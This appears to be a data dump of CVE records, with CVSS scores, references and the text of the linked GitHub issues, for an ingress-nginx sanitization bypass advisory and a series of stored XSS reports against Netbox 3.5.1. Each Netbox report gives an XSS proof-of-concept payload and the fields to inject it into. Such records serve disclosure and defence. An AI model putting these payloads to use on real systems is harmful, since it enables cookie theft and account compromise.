"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.7,
"source": "jordan@liggitt.net",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/kubernetes/ingress-nginx/issues/8686"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Mitigation",
"Vendor Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/avaRYa9c7I8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/kubernetes/ingress-nginx/issues/8686"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Mitigation",
"Vendor Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/avaRYa9c7I8"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E43BDC85-F198-4126-B487-21F6C3667561",
"versionEndExcluding": "1.2.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"20"
] | 20 | https://github.com/kubernetes/ingress-nginx/issues/8686 | [
"Issue Tracking",
"Mitigation",
"Vendor Advisory"
] | github.com | [
"kubernetes",
"ingress-nginx"
] | ### Issue Details
A security issue was discovered in [ingress-nginx](https://github.com/kubernetes/ingress-nginx) where a user that can create or update ingress objects can use a newline character to bypass the sanitization of the `spec.rules[].http.paths[].path` field of an Ingress object (in the `networking.k8s.io` or `extensions` API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.
This issue has been rated High ([CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L)), and assigned CVE-2021-25748.
### Affected Components and Configurations
This bug affects ingress-nginx. If you do not have ingress-nginx installed on your cluster, you are not affected. You can check this by running `kubectl get po -n ingress-nginx`.
If you are running the “chrooted” ingress-nginx controller introduced in v1.2.0 (gcr.io/k8s-staging-ingress-nginx/controller-chroot), you are not affected.
Multitenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue.
#### Affected Versions
<v1.2.1
#### Fixed Versions
v1.2.1
### Mitigation
If you are unable to roll out the fix, this vulnerability can be mitigated by implementing an admission policy that restricts the `spec.rules[].http.paths[].path` field on the networking.k8s.io/Ingress resource to known safe characters (see the newly added [rules](https://github.com/kubernetes/ingress-nginx/blame/main/internal/ingress/inspector/rules.go), or the suggested value for [annotation-value-word-blocklist](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#annotation-value-word-blocklist)).
### Detection
If you find evidence that this vulnerability has been exploited, please contact [security@kubernetes.io](mailto:security@kubernetes.io)
### Additional Details
See ingress-nginx Issue [#8686](https://github.com/kubernetes/kubernetes/issues/126814) for more details.
### Acknowledgements
This vulnerability was reported by Gafnit Amiga.
Thank You,
CJ Cullen on behalf of the Kubernetes Security Response Committee | CVE-2021-25748: Ingress-nginx `path` sanitization can be bypassed with newline character | https://api.github.com/repos/kubernetes/kubernetes/issues/126814/comments | 8 | 2022-06-10T16:01:41Z | 2024-08-20T13:21:36Z | https://github.com/kubernetes/kubernetes/issues/126814 | 2,475,632,907 | 126,814 | 5,178 |
CVE-2023-33785 | 2023-05-24T20:15:10.210 | A stored cross-site scripting (XSS) vulnerability in the Create Rack Roles (/dcim/rack-roles/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/8"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/8 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Rack Roles" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/dcim/rack-roles/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field.
---

---
**Step 2:** Go to `/dcim/racks/`, click "Add" and select "Role"
---

---
**Step 3: Script excuted
---

---
# Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. | Stored Cross Site Scripting Vulnerability in "Create Rack Roles" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/8/comments | 0 | 2023-05-18T16:20:48Z | 2023-05-18T16:20:48Z | https://github.com/anhdq201/netbox/issues/8 | 1,715,908,948 | 8 | 5,179 |
CVE-2023-33786 | 2023-05-24T20:15:10.263 | A stored cross-site scripting (XSS) vulnerability in the Create Circuit Types (/circuits/circuit-types/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/2 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Circuit Types" function in the "Circuits" feature.
# Proof of Concept
**Step 1:** Go to `/circuits/circuit-types/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field.
---

---
**Step 2:** Go to `/circuits/circuits/`, click "Add" and select "Type"
---

---
**Step 3: Script excuted
---

---
# Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. | Stored Cross Site Scripting Vulnerability in "Create Circuit Types" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/2/comments | 0 | 2023-05-18T15:09:47Z | 2023-05-18T15:25:56Z | https://github.com/anhdq201/netbox/issues/2 | 1,715,807,069 | 2 | 5,180 |
CVE-2023-33787 | 2023-05-24T20:15:10.317 | A stored cross-site scripting (XSS) vulnerability in the Create Tenant Groups (/tenancy/tenant-groups/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/6 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Tenant Groups" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/tenancy/tenant-groups/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field.
---

---
**Step 2:** Go to `/dcim/sites/`, click "Add" and select "Tenant group"
---

---
**Step 3: Script excuted
---

---
# Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. | Stored Cross Site Scripting Vulnerability in "Create Tenant Groups" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/6/comments | 0 | 2023-05-18T16:08:05Z | 2023-05-18T16:08:05Z | https://github.com/anhdq201/netbox/issues/6 | 1,715,892,519 | 6 | 5,181 |
CVE-2023-33788 | 2023-05-24T20:15:10.373 | A stored cross-site scripting (XSS) vulnerability in the Create Providers (/circuits/providers/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/3 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Providers" function in the "Circuits" feature.
# Proof of Concept
**Step 1:** Go to `/circuits/providers/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field.
---

---
**Step 2:** Go to `/circuits/provider-accounts/`, click "Add" and select "Provider"
---

---
**Step 3: Script excuted
---

---
# Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. | Stored Cross Site Scripting Vulnerability in "Create Providers" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/3/comments | 0 | 2023-05-18T15:18:30Z | 2023-05-18T15:25:34Z | https://github.com/anhdq201/netbox/issues/3 | 1,715,819,719 | 3 | 5,182 |
CVE-2023-33789 | 2023-05-24T20:15:10.430 | A stored cross-site scripting (XSS) vulnerability in the Create Contact Groups (/tenancy/contact-groups/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/7"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/7 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Contact Groups" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/tenancy/contact-groups/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field.
---

---
**Step 2:** Go to `/tenancy/contacts/`, click "Add" and select "Group"
---

---
**Step 3: Script excuted
---

---
# Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. | Stored Cross Site Scripting Vulnerability in "Create Contact Groups" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/7/comments | 0 | 2023-05-18T16:12:20Z | 2023-05-18T16:12:20Z | https://github.com/anhdq201/netbox/issues/7 | 1,715,897,991 | 7 | 5,183 |
CVE-2023-33790 | 2023-05-24T20:15:10.487 | A stored cross-site scripting (XSS) vulnerability in the Create Locations (/dcim/locations/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/9"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/9 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Locations" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/dcim/locations/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field.
---

---
**Step 2:** Go to `/dcim/racks/`, click "Add" and select "Location"
---

---
**Step 3: Script excuted
---

---
# Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. | Stored Cross Site Scripting Vulnerability in "Create Locations" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/9/comments | 0 | 2023-05-18T16:26:30Z | 2023-05-18T16:30:19Z | https://github.com/anhdq201/netbox/issues/9 | 1,715,915,970 | 9 | 5,184 |
CVE-2023-33791 | 2023-05-24T20:15:10.543 | A stored cross-site scripting (XSS) vulnerability in the Create Provider Accounts (/circuits/provider-accounts/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/4 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Provider Accounts" function in the "Circuits" feature.
# Proof of Concept
**Step 1:** Go to `/circuits/provider-accounts/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Account ID" field.
---

---
**Step 2:** Go to `/circuits/circuits/`, click "Add" and select "Provider account"
---

---
**Step 3: Script excuted
---

---
# Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. | Stored Cross Site Scripting Vulnerability in "Create Provider Accounts" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/4/comments | 0 | 2023-05-18T15:25:19Z | 2023-05-18T15:25:19Z | https://github.com/anhdq201/netbox/issues/4 | 1,715,829,577 | 4 | 5,185 |
CVE-2023-33792 | 2023-05-24T20:15:10.607 | A stored cross-site scripting (XSS) vulnerability in the Create Site Groups (/dcim/site-groups/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/10"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/10 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Site Groups" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/dcim/site-groups/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field.
---

---
**Step 2:** Go to `/dcim/sites/`, click "Add" and select "Group"
---

---
**Step 3: Script excuted
---

---
# Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. | Stored Cross Site Scripting Vulnerability in "Create Site Groups" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/10/comments | 0 | 2023-05-18T16:29:59Z | 2023-05-18T16:29:59Z | https://github.com/anhdq201/netbox/issues/10 | 1,715,921,814 | 10 | 5,186 |
CVE-2023-33793 | 2023-05-24T20:15:10.663 | A stored cross-site scripting (XSS) vulnerability in the Create Power Panels (/dcim/power-panels/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/1 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Power Panels" function in the "Power" feature.
# Proof of Concept
**Step 1:** Go to `/dcim/power-panels/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field.
---

---
**Step 2:** Go to `/dcim/power-feeds/`, click "Add" and select "Power panel"
---

---
**Step 3: Script excuted
---

---
# Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. | Stored Cross Site Scripting Vulnerability in "Create Power Panels" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/1/comments | 0 | 2023-05-18T15:04:10Z | 2023-05-18T15:26:12Z | https://github.com/anhdq201/netbox/issues/1 | 1,715,798,041 | 1 | 5,187 |
CVE-2023-33794 | 2023-05-24T20:15:10.717 | A stored cross-site scripting (XSS) vulnerability in the Create Tenants (/tenancy/tenants/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/5"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/5 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Tenants" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/tenancy/tenants/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field.
---

---
**Step 2:** Go to `/dcim/sites/`, click "Add" and select "Tenant"
---

---
**Step 3: Script excuted
---

---
# Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. | Stored Cross Site Scripting Vulnerability in "Create Tenants" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/5/comments | 0 | 2023-05-18T16:03:50Z | 2023-05-18T16:03:50Z | https://github.com/anhdq201/netbox/issues/5 | 1,715,886,167 | 5 | 5,188 |
CVE-2023-33795 | 2023-05-24T20:15:10.773 | A stored cross-site scripting (XSS) vulnerability in the Create Contact Roles (/tenancy/contact-roles/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. | {
